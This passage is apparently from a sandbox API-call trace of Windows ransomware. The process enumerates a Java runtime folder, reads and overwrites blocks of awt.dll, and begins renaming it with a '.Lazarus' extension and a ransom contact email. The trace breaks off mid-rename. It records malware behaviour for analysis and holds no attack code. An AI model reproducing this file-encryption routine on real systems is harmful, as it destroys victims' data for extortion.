Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.854] AreFileApisANSI () returned 1 [0089.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0089.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cd40 [0089.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin") returned 39 [0089.855] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.855] GetLastError () returned 0x5 [0089.855] GetLastError () returned 0x5 [0089.855] SetLastError (dwErrCode=0x5) [0089.855] GetLastError () returned 0x5 [0089.855] SetLastError (dwErrCode=0x5) [0089.855] GetLastError () returned 0x5 [0089.855] SetLastError (dwErrCode=0x5) [0089.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0089.855] AreFileApisANSI () returned 1 [0089.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0089.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0089.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin") returned 39 [0089.855] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.855] GetLastError () returned 0x5 [0089.855] GetLastError () returned 0x5 [0089.855] SetLastError (dwErrCode=0x5) [0089.855] GetLastError () returned 0x5 [0089.855] SetLastError (dwErrCode=0x5) [0089.855] GetLastError () returned 0x5 [0089.855] SetLastError (dwErrCode=0x5) [0089.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0089.856] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0089.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0089.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0089.856] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78610 [0089.925] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.935] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x172440, dwReserved0=0x0, dwReserved1=0x0, cFileName="awt.dll", cAlternateFileName="")) returned 1 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0089.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0089.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0089.936] AreFileApisANSI () returned 1 [0089.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll", lpUsedDefaultChar=0x0) returned 47 [0089.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0089.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0089.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.936] AreFileApisANSI () returned 1 [0089.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0089.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 47 [0089.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.940] GetFileType (hFile=0x360) returned 0x1 [0089.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.940] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.941] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.941] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.941] CloseHandle (hObject=0x360) returned 1 [0089.941] AreFileApisANSI () returned 1 [0089.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0089.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 47 [0089.941] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.941] GetFileType (hFile=0x360) returned 0x1 [0089.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.941] CloseHandle (hObject=0x360) returned 1 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.942] AreFileApisANSI () returned 1 [0089.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0089.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 47 [0089.942] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x172440)) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.942] AreFileApisANSI () returned 1 [0089.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0089.943] GetLastError () returned 0x0 [0089.943] SetLastError (dwErrCode=0x0) [0089.943] AreFileApisANSI () returned 1 [0089.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0089.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 47 [0089.943] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.943] GetFileType (hFile=0x360) returned 0x1 [0089.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0089.943] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0089.943] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0089.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0089.953] ReadFile (in: hFile=0x360, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0089.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0089.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0089.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0089.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8f448 [0089.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0089.962] GetLastError () returned 0x0 [0089.962] SetLastError (dwErrCode=0x0) [0089.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0089.962] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0089.962] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0089.963] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0089.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.963] CloseHandle (hObject=0x360) returned 1 [0090.094] AreFileApisANSI () returned 1 [0090.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0090.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0090.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 47 [0090.094] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.094] GetFileType (hFile=0x360) returned 0x1 [0090.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0090.094] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0090.095] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0090.096] ReadFile (in: hFile=0x360, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0090.096] GetLastError () returned 0x0 [0090.096] SetLastError (dwErrCode=0x0) [0090.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.096] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0090.096] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0090.097] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0090.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.097] CloseHandle (hObject=0x360) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0090.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0090.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0090.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0090.217] AreFileApisANSI () returned 1 [0090.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0090.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b00 [0090.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 47 [0090.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0090.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xda) returned 0x899e0 [0090.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x899e0, cchWideChar=109 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 109 [0090.217] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), lpNewFileName="C:\\Program 